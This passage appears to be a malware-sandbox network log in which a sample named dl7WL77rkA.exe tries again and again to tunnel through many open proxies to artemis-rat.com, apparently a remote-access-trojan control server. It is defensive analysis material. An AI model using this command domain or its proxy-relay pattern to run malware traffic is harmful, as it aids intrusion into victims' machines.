                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.239886045 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:58.224327087 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2049192.168.2.55222145.5.118.439993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.919754982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.993031979 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.709484100 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2050192.168.2.55545560.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.921274900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2051192.168.2.55546244.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.010962963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2052192.168.2.554740217.60.194.19831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.022095919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2053192.168.2.555453196.251.131.3880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.023035049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2054192.168.2.554133162.241.46.6500623876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.024703979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108040094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.202153921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.217822075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2055192.168.2.5541105.252.23.22031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.026571035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.701894999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405294895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.701956987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.275964022 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2056192.168.2.55415651.222.241.157440293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.026922941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2057192.168.2.552238103.209.68.19780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.031006098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.575700998 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2058192.168.2.555458218.65.6.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.039459944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.381282091 CET704INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: huawei
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:18:07 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 553
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 75 61 77 65 69 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>huawei</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2059192.168.2.552261119.93.148.19180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.041191101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.388981104 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2060192.168.2.554137176.98.81.8580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.041764021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.201776028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.202440023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2061192.168.2.555459185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.045095921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2062192.168.2.55518845.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.047775030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2063192.168.2.554104112.78.164.24880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.050086975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.201817989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.202440023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.202497005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2064192.168.2.55515998.170.57.23141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.054506063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2065192.168.2.555464212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.269341946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2066192.168.2.554126190.128.241.102803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.269345999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.342081070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514656067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.514692068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2067192.168.2.555461103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.269958973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2068192.168.2.55546946.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.270174026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2069192.168.2.552370103.152.132.2931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.271769047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
